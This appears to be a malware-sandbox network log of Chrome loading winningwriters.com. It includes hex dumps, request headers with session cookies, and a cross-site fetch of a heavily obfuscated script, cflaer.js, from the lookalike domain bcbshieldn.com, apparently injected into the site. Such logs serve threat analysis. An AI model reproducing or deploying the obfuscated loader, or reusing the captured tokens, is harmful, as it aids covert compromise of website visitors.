                                                                                                                                                                                            2024-11-18 20:00:11 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                            Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            111192.168.2.164984366.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:11 UTC962OUTGET /graphics/staff/jendi_reiter_by_ezra_autumn_wilde_2023_square_200.png HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646; _gid=GA1.2.1788557778.1731960008; _dc_gtm_UA-216038-1=1; _fbp=fb.1.1731960008619.29400145611624610; _ga_S2XE0RVPX9=GS1.1.1731960008.1.0.1731960008.60.0.0; _ga=GA1.1.723902191.1731960008
                                                                                                                                                                                            2024-11-18 20:00:11 UTC371INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:11 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Tue, 19 Dec 2023 19:59:51 GMT
                                                                                                                                                                                            ETag: "13e31-60ce24f3a412a"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 81457
                                                                                                                                                                                            Cache-Control: max-age=604800, public
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:11 GMT
                                                                                                                                                                                            Vary: User-Agent,Accept-Encoding
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            2024-11-18 20:00:11 UTC7821INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c8 00 00 00 c8 08 06 00 00 00 ad 58 ae 9e 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 87 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 31 2d 63 30 30 31 20 37 39 2e 31 34 36 32 38 39 39 37 37 37 2c 20 32 30 32 33 2f 30 36 2f 32 35 2d 32 33 3a 35 37 3a
                                                                                                                                                                                            Data Ascii: PNGIHDRXtEXtSoftwareAdobe ImageReadyqe<iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.1462899777, 2023/06/25-23:57:
                                                                                                                                                                                            2024-11-18 20:00:12 UTC8000INData Raw: 9e f9 fe a1 a5 9b ab 4b 69 c2 aa 26 0f b4 dd ee 38 a1 af a5 d1 f7 8f 3f bc a7 db cb b5 94 79 9f 76 1b 56 a6 b9 84 60 3b fe 3b c2 90 c3 09 e1 19 87 7a fc d5 f2 eb 1d c7 e9 07 fe fd 25 e7 26 d5 aa 16 7e 00 24 9e 40 37 40 19 61 39 2f 97 13 42 51 79 31 6f 04 03 96 c6 09 b4 17 a5 61 8a b3 92 4b 4c b9 81 c1 f2 9d 77 67 b3 1f 19 b1 0b a1 33 78 b8 26 ff 3a 1b 1b d2 8c b7 81 35 73 e8 13 52 e7 df 1a a0 41 bb dd 55 ce 77 43 46 11 e8 b8 85 55 1b d9 50 85 e9 92 23 d6 93 16 49 ab f3 9e 9a 8e 74 7b 7b be 83 8d 77 a4 ca 2b 14 dd a0 fa 5e 3d 9a d4 da 7a 9d 91 47 e3 f0 b0 7b 12 25 85 9c b6 87 47 e9 8b ac 38 ff 83 96 d6 6e 04 11 8e a3 21 1e 6f 28 bb 20 5a 1c ce 04 52 44 76 04 cd 48 70 83 10 d3 5c 76 25 e5 cc 04 63 97 7c 07 15 92 a8 21 82 7a 27 ad 6c 65 2c 11 c5 52 ab 77 ea
                                                                                                                                                                                            Data Ascii: Ki&8?yvV`;;z%&~$@7@a9/BQy1oaKLwg3x&:5sRAUwCFUP#It{{w+^=zG{%G8n!o( ZRDvHp\v%c|!z'le,Rw
                                                                                                                                                                                            2024-11-18 20:00:12 UTC8000INData Raw: 44 0b f8 09 e8 98 04 a1 3f 0c 54 a6 80 63 59 e7 66 83 4f 12 6a 01 47 a7 a5 2f eb 40 9e 31 4f 9c 53 7c c6 94 a4 cb ee 8a 41 42 20 32 f8 bb ee b0 e8 73 9d 3a 0f f9 e7 04 30 da 62 4e 45 28 0e 2c 4c 52 de 94 dd 23 95 f2 5f b1 f5 c3 03 74 2c c8 18 e1 14 0f 13 35 21 ac 48 43 af cf 15 36 af 28 48 4c f0 a6 3c c1 28 47 35 27 41 63 ac 96 81 a7 b7 db 3d dd 1f 95 8e a6 af 26 32 bb b2 3f 3d d0 02 d4 d2 fc 64 d7 ec 21 ae 57 4b 99 fd 5e af d7 02 5a 84 e7 d0 86 92 ed 3a 97 46 e8 94 bd 06 ae 73 a6 43 3e 08 93 3a e9 74 d9 64 64 d9 97 2d 74 42 6d 6f a5 60 c4 b7 3a 62 da ed 0e 52 9a 84 b5 92 fc cd e2 e8 e9 6a 25 21 9f f3 99 3d 43 e1 17 56 15 94 01 33 11 e0 86 43 ad 83 f5 4c bd 54 6a c4 b3 74 61 c4 0c 13 d2 9e a0 d1 4a e8 02 63 5f ce 6b fa e6 66 25 cd 8a f6 ee 40 bb 4e ab 5d
                                                                                                                                                                                            Data Ascii: D?TcYfOjG/@1OS|AB 2s:0bNE(,LR#_t,5!HC6(HL<(G5'Ac=&2?=d!WK^Z:FsC>:tdd-tBmo`:bRj%!=CV3CLTjtaJc_kf%@N]
                                                                                                                                                                                            2024-11-18 20:00:12 UTC8000INData Raw: be c6 12 97 54 5e 4b ae 2c 86 b2 c3 01 2c e7 0f f7 5b da f1 9f f0 28 e8 9e e2 a2 a6 b8 d8 e5 cc 66 09 06 49 e4 f0 a1 db dd 56 20 27 ba e6 4b e3 45 99 1e 0c 46 1b 34 ea 71 64 e0 59 5a a8 e2 46 39 c8 88 18 4e bc 6f 8c e7 7b ee 12 ad a2 1f 13 38 14 cb a4 8c f2 ea ad 10 32 a0 a1 29 6c 25 57 57 d6 f8 ea 65 45 d9 c7 4f 24 df bf 60 61 44 98 d3 09 bc a5 d6 86 26 59 35 ab 9a 2a fb 08 76 75 4c d6 d2 70 6a c1 59 d5 1d 58 90 ef e9 f1 e1 9e ef b9 a3 77 1f ef e8 e3 87 0f f4 81 ff 7c f3 e1 a3 84 68 0b 7e 2d bc f2 cd d5 8a 5e f1 67 5f ae 56 b2 76 19 5c 5c b2 55 ab d2 fa bf c0 df 65 ae 5c e3 e2 8e c3 b0 ed e3 51 c2 b7 35 bf fe 6e bb 93 fe ca 1a 95 aa 30 a3 39 b0 6f ec 31 6e e6 8d e6 33 83 cd 59 c3 0b 54 95 18 b3 5e aa 6c 41 f6 4c 9e 84 4c 5b 85 ea fd c3 86 1e b7 07 09 c5
                                                                                                                                                                                            Data Ascii: T^K,,[(fIV 'KEF4qdYZF9No{82)l%WWeEO$`aD&Y5*vuLpjYXw|h~-^g_Vv\\Ue\Q5n09o1n3YT^lALL[
                                                                                                                                                                                            2024-11-18 20:00:12 UTC8000INData Raw: 49 cf f0 a6 f8 e9 74 43 c3 e1 84 96 7b 1d e1 6c 14 fe 74 51 35 33 af 5b 26 75 02 00 86 90 e8 89 4d 49 5e bc ce 05 68 d0 95 e1 a8 e0 7e 92 ba 40 6a 62 5c 03 8a 6d 40 dc 81 b5 6a f5 28 6e f7 29 e5 34 6d 3e 3a e3 8d d2 e7 7b 06 bb e7 16 15 71 87 37 dc 90 1f d0 82 ea 1c a5 a3 45 5d 16 60 7e 39 0a fe 86 58 68 bb 1c 29 ba bd ae ba cb f2 fd 80 d2 e2 4f 3f 3c a1 d7 de 3b a5 93 8b 11 dd 3e 3a a2 5d ae 29 0f 6f 1c 50 bb 93 0b c6 aa e0 e7 19 89 af 79 21 ee 5f 51 ac 33 94 e5 62 ad 5d 2b f1 60 2f a4 c5 2d 69 35 6a 87 4c e7 5d 88 32 62 35 60 86 9f f2 ef 91 5a 55 40 18 62 01 9e be 50 5a 53 3a ec 37 69 b0 cb 91 b2 db a0 76 af a9 6c be 28 36 95 76 2a 33 03 e3 dc 6a 7b d5 2b 21 aa bb 96 ab 48 f8 44 5e a4 bc 28 c7 0c 3e ad 56 33 d2 a2 02 3c f4 54 0a 0a ea 98 5e 48 d0 15 a5
                                                                                                                                                                                            Data Ascii: ItC{ltQ53[&uMI^h~@jb\m@j(n)4m>:{q7E]`~9Xh)O?<;>:])oPy!_Q3b]+`/-i5jL]2b5`ZU@bPZS:7ivl(6v*3j{+!HD^(>V3<T^H
                                                                                                                                                                                            2024-11-18 20:00:12 UTC8000INData Raw: 4d e1 79 e3 14 ea be d2 92 5b 75 c9 10 15 a2 b8 ec 5c 79 64 6d a5 e9 1e e6 21 5e 6c 23 90 a1 02 fe ef a3 07 67 e5 40 2d 89 14 61 84 50 12 a9 ca 4d eb d7 aa f0 4b 8a b2 c3 16 da ff 06 75 f2 9c 91 dc 95 3a 09 c9 96 bd 78 15 92 4c b9 a1 2e cb 22 38 0c 0a 2b b9 57 11 54 bb ab ee 26 7e 6a 5d 42 52 72 53 b1 70 96 27 2a 2e 2b 0b 36 6c 7a 9a 97 96 d3 51 65 c3 79 d5 f9 dc f7 c6 fd a9 11 66 2c a6 a3 85 ae 17 6f 10 a4 26 d8 2c 49 52 36 08 7c 4b b0 10 c0 9b 13 a9 7f 64 7b 59 be a1 39 ef 8e b5 68 23 e5 f4 17 df ff 3a 7d f6 de b3 d4 e3 7f 3f 83 ca 21 40 79 58 48 79 56 0a 8e d5 38 77 5f 4c 45 37 16 77 15 3e 23 eb da 52 64 f6 09 69 01 6f 9c e9 68 c8 f5 05 1c 98 66 74 31 db d0 94 8b 87 53 7e bf 2b ae 37 7e f9 99 4f d0 e1 c7 1e a3 36 57 12 07 fd 84 2e f8 c4 5f 4e 66 34 e4
                                                                                                                                                                                            Data Ascii: My[u\ydm!^l#g@-aPMKu:xL."8+WT&~j]BRrSp'*.+6lzQeyf,o&,IR6|Kd{Y9h#:}?!@yXHyV8w_LE7w>#Rdiohft1S~+7~O6W._Nf4
                                                                                                                                                                                            2024-11-18 20:00:12 UTC8000INData Raw: ce 7d 8e 4a 0f df 7b 83 37 c3 4c a2 a5 ea 42 71 74 5c cd e5 a8 58 f0 02 ae 77 1b 02 cd 88 38 02 ad 16 33 8b 82 09 7f e7 a6 f0 ba d7 6b 05 27 d6 cd 69 17 ed 56 88 1e 00 be be 59 4c a9 df 1b 70 ee 1d c9 b4 1f f7 61 81 19 07 ee 3f 3a 7e fc 33 43 8e 80 40 0e df d8 e9 c8 69 bb 49 b5 d8 ee 34 31 e1 4e 38 7a 69 91 0e a7 a5 34 35 61 e7 42 bb 4e 85 75 92 6a b5 ba a4 72 0b 99 37 e4 12 49 d6 a9 b2 21 f1 ec 91 8e a1 cd ef 8d 3a 33 8f 88 2d 14 d4 39 5c a6 34 e5 eb fa e4 5e 4f 04 bf fd cc c3 d7 1c 2e 74 41 8b 72 40 17 88 4e 64 8d 12 f5 9f 6f ef f4 24 7d cc 4c 2b 19 a7 bd 7a 94 db cf 4a bd c7 91 23 4f e8 fd ff fd 5f 10 9d 9e d3 c1 6f 7f 89 96 87 7b f4 04 47 f6 f3 7f f6 87 f4 d3 d7 ce 68 fc 70 42 b7 bf fc 34 35 9e be 41 d9 34 35 72 98 7a cb 24 51 d9 8d 53 4e cc b6 a6 5b
                                                                                                                                                                                            Data Ascii: }J{7LBqt\Xw83k'iVYLpa?:~3C@iI41N8zi45aBNujr7I!:3-9\4^O.tAr@Ndo$}L+zJ#O_o{GhpB45A45rz$QSN[
                                                                                                                                                                                            2024-11-18 20:00:12 UTC8000INData Raw: 00 91 3e ce 81 fb 46 64 e9 47 88 80 f9 91 f1 3e 6f 81 12 a7 72 91 ce 4b 41 86 b7 d8 83 05 29 a1 8d ba 1d 24 47 3c 18 89 47 90 08 7a 05 26 cd 2c 6d 60 69 83 a0 0d e3 6c ba 83 ab 8b 1d ec d9 95 c4 db 7e eb af 55 ed de 6e aa 09 50 c3 be ae c1 26 fb 0a 6a 3e 49 1a 63 3c 31 4a de 9d 1b 6c dc b1 f5 11 7e 8c 0d 0d a2 5e 2e a1 4c 09 96 97 e0 47 38 39 a6 96 9c 72 29 f8 c3 51 82 2e dc 00 a4 03 55 af 0a 3c 93 44 9e 3b ae 86 57 d8 4e 38 f2 b8 29 37 70 fb 83 92 a3 b0 61 b9 e8 26 73 42 18 f0 0e 52 ee e0 60 61 fe f3 08 7a fe 19 6d eb 3d 38 bb 41 07 82 3e ff 18 e1 d1 44 c8 2b e4 6d 09 9f 8d 1c e5 59 e7 2e cc 60 ef d4 16 35 cf a3 17 fd 39 09 e6 3a d5 d5 ce 20 79 25 13 61 93 92 54 28 09 32 81 9a 74 4f b9 0c cc 5d 74 19 82 23 8f cd 44 69 42 f7 c3 f3 48 7a 77 c2 e9 ea 61 c8
                                                                                                                                                                                            Data Ascii: >FdG>orKA)$G<Gz&,m`il~UnP&j>Ic<1Jl~^.LG89r)Q.U<D;WN8)7pa&sBR`azm=8A>D+mY.`59: y%aT(2tO]t#DiBHzwa
                                                                                                                                                                                            2024-11-18 20:00:12 UTC8000INData Raw: 7b b4 9c af 12 3c 6c 60 d7 be 83 48 51 1e f5 e4 46 1f 25 bb 0d b8 57 9e a7 67 57 a4 6b b6 44 05 8a ab 6b fc a1 56 96 97 f1 e4 e3 a7 70 e5 ea 1a 86 86 47 b0 79 7c 58 0a 3a ec 9c 1c 02 fa cf a4 3a c8 9a 09 fa d9 06 ae cc 2e c1 fa c5 1a e2 cd 36 e6 ab 1e fc ec 92 07 95 f5 0e b6 47 29 af e2 ca 1f dd d7 e7 bc 93 58 25 28 e3 ae af 0a ad 6a 88 3e 2f e7 4a 4f 3b 03 78 bc 15 47 b5 65 61 b3 cf 8d 1a 19 c1 ec 93 f3 08 0c 8f e1 47 c9 63 78 94 75 be 02 36 32 2b 2b 28 9e 9b c1 99 1f 57 70 e5 94 5b 76 66 3c f5 34 f2 b5 36 ea ee 11 f4 0f 1f c1 a6 4d d3 b0 3d 83 78 66 6d 02 b3 d9 01 a4 5b 31 9c 4b 4d e3 d9 a5 69 3c 70 e9 30 d6 eb 43 08 8d d2 79 89 ba e1 5d 22 c7 5d 76 a3 b1 8d 95 85 73 08 1b e4 04 cd 34 fc 66 a1 69 7d f4 83 1f fa c4 ff 7a ff c7 bc d1 44 92 a0 d4 aa 2a c5
                                                                                                                                                                                            Data Ascii: {<l`HQF%WgWkDkVpGy|X::.6G)X%(j>/JO;xGeaGcxu62++(Wp[vf<46M=xfm[1KMi<p0Cy]"]vs4fi}zD*
                                                                                                                                                                                            2024-11-18 20:00:12 UTC8000INData Raw: b5 26 32 d5 12 02 83 49 04 87 b6 cb e1 75 97 ea 02 9f 40 c9 24 74 22 2a 65 29 ba a9 46 b6 08 e7 f4 02 2a f4 f9 6a b9 25 d8 5e fa 7e d4 2f 95 22 d6 b1 68 35 58 8d cb 85 86 4b 6d 58 a6 d2 59 a9 3a 19 e2 40 4a 92 a8 b3 cc 99 4f d4 b8 3c 68 3a 6a 3e 4a 7a 17 1e b7 38 81 2d 3b 0f 62 64 72 0b ca f5 8e 5e 9c 72 64 97 df d6 92 d0 5c d0 b0 f5 6a ae 90 5a 43 af d9 32 d9 f2 c2 3a 26 77 ee c7 a7 7e f8 38 0e 92 71 5c 7d 61 1e 5f fe dd 0f e3 81 af fc 25 e2 c9 24 19 c7 88 d6 7c b4 7b 3c 64 5d 40 21 a8 cd e9 e8 d5 5f 5b 89 79 7a 14 2b 3c 0f 43 72 81 c3 45 50 9b 57 08 5c 7a 9d 41 7b 2e 44 c2 74 d0 ab 2d fc f3 52 09 cf 71 b9 56 e2 98 89 1c 37 09 29 08 a7 08 76 dd 65 15 b1 dd 55 46 db ad 08 08 43 e1 7e 78 98 68 9c 63 b4 cd 15 ca ac 14 6c 06 e8 10 fb 08 75 b8 dd 49 0c 1f dc
                                                                                                                                                                                            Data Ascii: &2Iu@$t"*e)F*j%^~/"h5XKmXY:@JO<h:j>Jz8-;bdr^rd\jZC2:&w~8q\}a_%$|{<d]@!_[yz+<CrEPW\zA{.Dt-RqV7)veUFC~xhcluI


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            112192.168.2.1649845188.114.97.34436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:13 UTC525OUTGET /cflaer.js HTTP/1.1
                                                                                                                                                                                            Host: bcbshieldn.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-18 20:00:13 UTC892INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:13 GMT
                                                                                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Last-Modified: Mon, 18 Nov 2024 08:21:38 GMT
                                                                                                                                                                                            ETag: W/"673af912-e7681"
                                                                                                                                                                                            Cache-Control: max-age=14400
                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                            Age: 6608
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6oAf8Tw2wbj1yaHmfecsXDoN1lbdgj29CY2BgEC00ZVsTIbJpX30TnWg%2FI%2BX5Q6NSr5UCbkfE5LSWfqWlOf%2BTa6%2BM7yvdKSp%2FIlZIHkUPh4C%2BI5yTk3DbsbiMzawVuvN8Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8e4a8ba27f3de65b-DEN
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=22400&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1103&delivery_rate=128033&cwnd=32&unsent_bytes=0&cid=2f97baea1fab032c&ts=176&x=0"
                                                                                                                                                                                            2024-11-18 20:00:13 UTC477INData Raw: 37 63 65 30 0d 0a 66 75 6e 63 74 69 6f 6e 20 5f 30 78 33 31 62 66 28 5f 30 78 31 30 37 38 33 65 2c 5f 30 78 33 35 36 63 35 61 29 7b 63 6f 6e 73 74 20 5f 30 78 33 33 38 61 34 61 3d 5f 30 78 32 34 32 61 28 29 3b 72 65 74 75 72 6e 20 5f 30 78 33 31 62 66 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 65 38 31 35 31 2c 5f 30 78 33 62 34 33 33 31 29 7b 5f 30 78 31 65 38 31 35 31 3d 5f 30 78 31 65 38 31 35 31 2d 28 2d 30 78 35 2a 30 78 34 30 31 2b 2d 30 78 31 62 39 64 2a 30 78 31 2b 30 78 33 31 37 37 29 3b 6c 65 74 20 5f 30 78 35 37 38 34 62 37 3d 5f 30 78 33 33 38 61 34 61 5b 5f 30 78 31 65 38 31 35 31 5d 3b 69 66 28 5f 30 78 33 31 62 66 5b 27 45 6f 56 49 4c 4c 27 5d 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 29 7b 76 61 72 20 5f 30 78 38 38 32 31 31 32 3d 66 75 6e 63 74
                                                                                                                                                                                            Data Ascii: 7ce0function _0x31bf(_0x10783e,_0x356c5a){const _0x338a4a=_0x242a();return _0x31bf=function(_0x1e8151,_0x3b4331){_0x1e8151=_0x1e8151-(-0x5*0x401+-0x1b9d*0x1+0x3177);let _0x5784b7=_0x338a4a[_0x1e8151];if(_0x31bf['EoVILL']===undefined){var _0x882112=funct
                                                                                                                                                                                            2024-11-18 20:00:13 UTC1369INData Raw: 31 63 2c 5f 30 78 33 37 65 66 31 35 3d 2d 30 78 39 37 31 2a 30 78 31 2b 30 78 33 32 2a 2d 30 78 62 62 2b 30 78 32 64 66 37 3b 5f 30 78 34 30 39 33 31 63 3d 5f 30 78 32 62 65 37 39 34 5b 27 63 68 61 72 41 74 27 5d 28 5f 30 78 33 37 65 66 31 35 2b 2b 29 3b 7e 5f 30 78 34 30 39 33 31 63 26 26 28 5f 30 78 33 62 62 30 63 39 3d 5f 30 78 33 64 65 39 37 34 25 28 2d 30 78 31 33 38 37 2b 2d 30 78 31 62 65 33 2b 30 78 32 66 36 65 29 3f 5f 30 78 33 62 62 30 63 39 2a 28 2d 30 78 33 2a 2d 30 78 34 34 66 2b 2d 30 78 32 36 31 39 2b 30 78 31 39 36 63 29 2b 5f 30 78 34 30 39 33 31 63 3a 5f 30 78 34 30 39 33 31 63 2c 5f 30 78 33 64 65 39 37 34 2b 2b 25 28 30 78 35 64 39 2a 2d 30 78 32 2b 2d 30 78 31 66 62 66 2b 30 78 31 2a 30 78 32 62 37 35 29 29 3f 5f 30 78 31 62 62 34 66
                                                                                                                                                                                            Data Ascii: 1c,_0x37ef15=-0x971*0x1+0x32*-0xbb+0x2df7;_0x40931c=_0x2be794['charAt'](_0x37ef15++);~_0x40931c&&(_0x3bb0c9=_0x3de974%(-0x1387+-0x1be3+0x2f6e)?_0x3bb0c9*(-0x3*-0x44f+-0x2619+0x196c)+_0x40931c:_0x40931c,_0x3de974++%(0x5d9*-0x2+-0x1fbf+0x1*0x2b75))?_0x1bb4f
                                                                                                                                                                                            2024-11-18 20:00:13 UTC1369INData Raw: 78 61 2a 30 78 36 29 2c 5f 30 78 31 30 36 63 62 65 3d 5f 30 78 33 61 63 37 65 36 5b 5f 30 78 31 34 37 33 31 66 5d 2c 5f 30 78 33 61 63 37 65 36 5b 5f 30 78 31 34 37 33 31 66 5d 3d 5f 30 78 33 61 63 37 65 36 5b 5f 30 78 35 34 63 36 34 31 5d 2c 5f 30 78 33 61 63 37 65 36 5b 5f 30 78 35 34 63 36 34 31 5d 3d 5f 30 78 31 30 36 63 62 65 3b 7d 5f 30 78 31 34 37 33 31 66 3d 30 78 32 36 34 62 2a 2d 30 78 31 2b 2d 30 78 32 30 66 66 2b 2d 30 78 37 64 2a 2d 30 78 39 32 2c 5f 30 78 35 34 63 36 34 31 3d 30 78 31 35 34 38 2b 30 78 31 37 35 64 2b 2d 30 78 32 63 61 35 2a 30 78 31 3b 66 6f 72 28 6c 65 74 20 5f 30 78 64 33 34 63 39 65 3d 2d 30 78 31 39 39 2b 2d 30 78 32 62 2a 2d 30 78 37 31 2b 2d 30 78 31 31 36 32 3b 5f 30 78 64 33 34 63 39 65 3c 5f 30 78 35 38 61 64 33 31
                                                                                                                                                                                            Data Ascii: xa*0x6),_0x106cbe=_0x3ac7e6[_0x14731f],_0x3ac7e6[_0x14731f]=_0x3ac7e6[_0x54c641],_0x3ac7e6[_0x54c641]=_0x106cbe;}_0x14731f=0x264b*-0x1+-0x20ff+-0x7d*-0x92,_0x54c641=0x1548+0x175d+-0x2ca5*0x1;for(let _0xd34c9e=-0x199+-0x2b*-0x71+-0x1162;_0xd34c9e<_0x58ad31
                                                                                                                                                                                            2024-11-18 20:00:13 UTC1369INData Raw: 66 27 5d 29 2c 5f 30 78 32 30 31 32 63 62 3d 5f 30 78 32 63 36 66 36 35 5b 27 74 65 73 74 27 5d 28 74 68 69 73 5b 27 65 71 69 53 4b 77 27 5d 5b 27 74 6f 53 74 72 69 6e 67 27 5d 28 29 29 3f 2d 2d 74 68 69 73 5b 27 47 52 4a 78 58 7a 27 5d 5b 30 78 32 2a 2d 30 78 62 65 37 2b 30 78 35 2a 2d 30 78 33 39 2b 30 78 63 37 36 2a 30 78 32 5d 3a 2d 2d 74 68 69 73 5b 27 47 52 4a 78 58 7a 27 5d 5b 30 78 31 2a 30 78 31 34 62 33 2b 30 78 32 39 61 2a 30 78 34 2b 2d 30 78 31 2a 30 78 31 66 31 62 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 5b 27 79 52 4b 77 4f 6a 27 5d 28 5f 30 78 32 30 31 32 63 62 29 3b 7d 2c 5f 30 78 34 39 30 63 32 37 5b 27 70 72 6f 74 6f 74 79 70 65 27 5d 5b 27 79 52 4b 77 4f 6a 27 5d 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 61 37 66 34 65 29 7b 69 66 28 21
                                                                                                                                                                                            Data Ascii: f']),_0x2012cb=_0x2c6f65['test'](this['eqiSKw']['toString']())?--this['GRJxXz'][0x2*-0xbe7+0x5*-0x39+0xc76*0x2]:--this['GRJxXz'][0x1*0x14b3+0x29a*0x4+-0x1*0x1f1b];return this['yRKwOj'](_0x2012cb);},_0x490c27['prototype']['yRKwOj']=function(_0x3a7f4e){if(!
